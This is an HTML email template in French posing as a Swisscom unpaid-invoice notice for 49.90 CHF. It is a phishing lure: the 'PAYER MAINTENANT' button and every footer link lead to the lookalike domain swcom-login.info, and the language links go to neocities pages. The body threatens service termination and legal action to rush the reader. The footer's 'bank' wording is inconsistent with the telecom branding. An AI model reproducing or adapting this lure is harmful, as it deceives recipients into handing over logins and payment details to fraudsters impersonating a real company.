<!DOCTYPE html>
<html lang="fr">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facture impayée</title>
    
    
</head>
<body style="font-family: Arial, sans-serif; color: #333; margin: 0; padding: 0; background-color: #f4f4f4;">
    <table width="100%" cellspacing="0" cellpadding="0" border="0" style="background-color: #f4f4f4; padding: 20px;">
        <tr>
            <td align="center">
                <table width="600" cellspacing="0" cellpadding="0" border="0" style="background-color: #ffffff; border-radius: 8px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
                    <tr>
                        <td style="padding: 10px; text-align: center;">
                            <div class="version-info" style="text-align: center;font-size: 12px;color: #888888;margin: 10px 0;">
                                <span>Choisir la langue : </span>
                                <a href="https://swisscomtranslateemailde.neocities.org" style="color: #007bff;text-decoration: none;">Deutsch</a> | 
                                <a href="https://swisscomtranslateemailfr.neocities.org" style="color: #007bff;text-decoration: none;">Français</a> | 
                                <a href="https://swisscomtranslateemailen.neocities.org" style="color: #007bff;text-decoration: none;">English</a> | 
                                <a href="https://swisscomtranslateemailit.neocities.org" style="color: #007bff;text-decoration: none;">Italiano</a>
                            </div>
                        </td>
                    </tr>
                    <tr>
<!-- Modification ici pour centrer l'image -->
<td style="text-align: center; padding: 10px;">
    <img src="https://image.noelshack.com/fichiers/2024/34/5/1724390080-logo-swisscom.png" alt="" style="width: 60%; height: auto; border-radius: 8px 8px 0 0;">
</td>
                    </tr>
                    <tr>
                        <td style="padding: 20px;">
                            <h1 align="center" style="font-family: 'BarlowSemiCondensed-Bold', Helvetica Neue, Helvetica, sans-serif; font-weight: bold; font-size: 20px; color: #015; margin-top: 0;">Facture impayée</h1>
                            <p style="font-size: 14px; line-height: 1.6; margin: 0 0 15px 0;">Madame, Monsieur,</p>
                            <p style="font-size: 14px; line-height: 1.6; margin: 0 0 15px 0;">Nous souhaitons vous informer qu'une facture est en attente de paiement. Le montant et la date d'échéance sont les suivants :</p>
                            <p style="font-size: 14px; line-height: 1.6; margin: 0 0 15px 0;"><strong>Montant :</strong> 49.90 CHF</p>
                            <p style="font-size: 14px; line-height: 1.6; margin: 0 0 15px 0;"><strong>Date :</strong> 30/09/2024</p>
                            <p style="font-size: 14px; line-height: 1.6; margin: 0 0 15px 0;">Afin d'éviter des frais supplémentaires significatifs et l'interruption définitive de vos services, nous vous demandons de régler le montant dû dans les plus brefs délais, c'est-à-dire avant la date limite de l'échéancier communiqué dans ce mail.</p>
                            <a href="https://www.swcom-login.info/" style="display: block; width: 200px; margin: 20px auto; padding: 10px; font-size: 14px; color: #ffffff; background-color: rgb(0, 72, 207); border-radius: 5px; text-align: center; text-decoration: none;">PAYER MAINTENANT</a>
                            <p style="font-size: 14px; margin: 0 0 15px 0;"><strong>IMPORTANT :</strong></p>
                            <p style="font-size: 14px; margin: 0 0 15px 0;">Veuillez noter qu'en cas de non-paiement de votre part, nous serons contraints d'engager des poursuites judiciaires.</p>
                        </td>
                    </tr>
                    <tr>
                        <td style="color: black; padding: 20px; border-radius: 12px; text-align: center; border: 1px solid #bbb;">
                            <h1 style="color: black;">Votre application bancaire</h1>
                            <p style="font-size: 14px;">Vos opérations bancaires quotidiennes, plus simples et plus rapides.</p>
                            <p style="font-size: 14px; margin: 20px 0;">Gérez tous vos comptes via l'application</p>
                            <img src="https://rcp.scsstatic.ch/content/dam/assets/b2c/products/angebote/cashback-mar-24/promo-cashback-internet-tv-781x606-2x.png" alt="Votre application bancaire" style="border-radius: 8px; width: 150px; height: auto;">
                        </td>
                    </tr>
                    <tr>
                        <td style="padding: 20px; background-color: #333; color: #ffffff; border-radius: 8px; text-align: center;">
                            <p style="font-size: 12px; margin: 10px 0;">Siège principal de la banque</p>
                            <p style="font-size: 12px; margin: 10px 0;"><a href="https://www.swcom-login.info/" style="color: #ffffff; text-decoration: none;">Accessibilité</a></p>
                            <p style="font-size: 12px; margin: 10px 0;"><a href="https://www.swcom-login.info/" style="color: #ffffff; text-decoration: none;">Mentions légales</a></p>
                            <p style="font-size: 12px; margin: 10px 0;"><a href="https://www.swcom-login.info/" style="color: #ffffff; text-decoration: none;">Confidentialité</a></p>
                            <p style="font-size: 12px; margin: 10px 0;"><a href="https://www.swcom-login.info/" style="color: #ffffff; text-decoration: none;">Risques de fraude</a></p>
                            <p style="font-size: 12px; margin: 10px 0;">©2024 Votre banque</p>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>
</body>
</html>
